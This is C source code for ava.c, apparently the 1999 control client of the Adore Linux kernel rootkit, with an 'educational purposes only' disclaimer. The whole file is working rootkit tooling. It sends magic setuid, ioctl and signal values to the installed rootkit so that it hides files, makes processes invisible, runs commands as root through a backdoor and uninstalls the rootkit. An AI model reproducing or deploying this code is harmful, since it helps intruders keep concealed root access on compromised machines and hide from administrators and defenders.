/*** ava.c (C) 1999 by Stealth -- http://www.kalug.lug.net
 *** UNDER a BSD ish license. So you use it at your own risk!
 *** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
 ***/
#include <sys/types.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <errno.h>
#include <sys/signal.h>
#include <stdlib.h>

#define PF_INVISIBLE 0x10000000
#define SIGINVISIBLE 33
#define SIGVISIBLE   34
#ifndef ELITE_CMD
#define ELITE_CMD 31337
#endif
#define HIDE_FILE 0x40
#define UNHIDE_FILE 0x2600

int adore_installed()
{
	return setuid(ELITE_CMD+2);
}

int main(int argc, char *argv[])
{
   	int fd, version;
        char what;
	
    
        if (argc < 3) {
           	printf("Usage: %s {h,u,r,i,v,U} [file, PID or dummy (for 'U')]\n\n"
		       "       h hide file\n"
		       "       u unhide file\n"
		       "       r execute as root\n"
		       "       U uninstall adore\n"
		       "       i make PID invisible\n"
		       "       v make PID visible\n\n", argv[0]);
                exit(1);
        }
        what = argv[1][0];
    
	printf("Checking for adore  0.12 or higher ...\n");
	if ((version = adore_installed()) <= 0) {
		printf("Adore NOT installed. Exiting.\n");
		exit(1);
	}
	if (version < 14) 
		printf("Found adore 0.%d installed. Please update adore.", version);
	else
		printf("Adore 0.%d installed. Good luck.\n", version);
    
        switch (what) {
        
        /* hide file */
        case 'h':
           	if ((fd = open(argv[2], O_RDONLY)) < 0) {
	               perror("open");
                       exit(errno);
                }
                if ((ioctl(fd, ELITE_CMD, HIDE_FILE)) < 0) {    
                   	perror("ioctl");
                        exit(errno);
                }
                close(fd);
                printf("File '%s' hided.\n", argv[2]);
		break;
		        
        /* unhide file */
        case 'u':
           	if ((fd = open(argv[2], O_RDONLY)) < 0) {
	               perror("open");
                       exit(errno);
                }
                if ((ioctl(fd, ELITE_CMD, UNHIDE_FILE)) < 0) {    
                   	perror("ioctl");
                        exit(errno);
                }
                close(fd);
                printf("File '%s' unhided.\n", argv[2]);
                break;
	/* make pid invisible */
	case 'i':
		kill(atoi(argv[2]), SIGINVISIBLE);
		printf("Made PID %d invisible.\n", atoi(argv[2]));
		break;
	
	/* make pid visible */
	case 'v':
		kill(atoi(argv[2]), SIGVISIBLE);
		printf("Made PID %d visible.\n", atoi(argv[2]));
		break;
        /* execute command as root */
        case 'r': 
		setuid(ELITE_CMD);
		if (getuid()) 
			printf("huh? something went wrong.\n");
                execve(argv[2], argv+2, NULL);
	/* uninstall adore */
	case 'U':
		setuid(ELITE_CMD+1);
		printf("Adore 0.%d de-installed.\n", version);
		break;
        default:
           	printf("Did nothing or failed.\n");
        }
	return 0;
}

